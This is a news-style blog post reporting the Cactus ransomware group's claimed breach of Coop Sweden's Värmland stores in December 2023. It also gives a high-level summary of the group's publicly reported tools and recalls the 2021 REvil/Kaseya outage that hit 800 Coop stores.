[German]The Swedish Coop supermarket group has probably fallen victim to another cyberattack. I read a few days ago that the ransomware group Cactus, which has been operating since 2023, listed Coop as a victim on its Tor leak page. In the meantime, Coop has probably confirmed that ransomware has infected the stores in the Värmland region. In 2021, 800 Coop stores in Sweden stopped working because a cyberattack on a checkout operator had paralyzed them.
Advertising
Who is Coop?
Coop Schweden is a Swedish supermarket chain organized as a cooperative, which is responsible for a good 20% of sales in this sector. Coop operates around 800 stores, which are co-owned by 3.5 million members of 29 consumer associations. All surpluses generated by the company are returned to the members or reinvested in the company, creating a virtuous circle.
Coop victim of the Cactus Group
At January 1, 2024, I came across the information in the following tweet that the Cactus ransomware group had listed Coop as a victim on its Tor leak page.
The Cactus Group writes that Coop has a turnover of 6.5 billion US dollars in Sweden and that 257 Gbytes of data were captured in an attack. The group published 1% of this on the leak page. Security Affairs writes in the article linked in the tweet above that the ransomware group Cactus claims to have hacked Coop in Sweden. The group threatens to expose personal files from over 21,000 directories.
The Cactus ransomware group
The Cactus ransomware group has only been active since March 2023 (see Bleeping Computer), but seems to have "picked up speed" at the end of 2023. This article from December 2023 states that Microsoft is warning about Cactus ransomware. Artic Wolf published this article in November 2023 about a newly observed campaign by this group.
Advertising
According to Security Affairs, the Cactus ransomware relies on several legitimate tools (e.g. Splashtop, AnyDesk, SuperOps RMM) to gain remote access to a company's IT network. If the malware is installed on the computer and has sufficient privileges, anti-virus solutions installed on the computer are uninstalled via a batch script.
Then the Cactus ransomware uses the SoftPerfect Network Scanner (netscan) to search for other targets on the network. The endpoints on the network are listed via PowerShell commands. The ransomware identifies user accounts by displaying successful logins in the Windows Event Viewer. It also uses a modified variant of the open source tool PSnmap, as well as Cobalt Strike and the proxy tool Chisel for post-propagation activities. To extract the data, the tool Rclone and a PowerShell script called TotalExec (which was used in the past by the operators of the BlackBasta ransomware to automate the deployment of the encryption process) are used.
Coop confirms the attack
The Retail Insights Network wrote on January 3, 2023 that Coop Sweden has confirmed the cyber attack by Cactus. The cyberattack began on December 22, 2023 and resulted in all Coop stores in Värmland being unable to process card payments.Coop operates 44 supermarkets, 15 Pekås and two MaxiMat stores in Värmland. However, the stores remained open.
A Coop spokesperson was quoted by Recorded Future News as saying, "We can confirm that Coop Värmland has been the victim of a cyberattack." Following the discovery of the cyber attack, external experts were brought in, focusing primarily on closing the vulnerabilities. The current assessment shows that these vulnerabilities, through which the attackers were able to penetrate, have been successfully fixed.
Already attack 2021
I remembered the Coop cyberattack from summer 2021, which I reported on in the blog post Coop-Sweden closes 800 stores after Kaseya VSA supply chain attack by REvil gang. At the time, the REvil ransomware group had succeeded in compromising the provider Kaseya VSA via a supply chain attack. This allowed the payment service provider Visma EssCom used by Coop to be attacked. At the end of the day, the cash registers in the 800 Coop stores stopped working, meaning that no payments could be made. In Sweden, where people hardly have any cash left, this is quite a drama.
Similare:
Coop-Sweden closes 800 stores after Kaseya VSA supply chain attack by REvil gang
Advertising
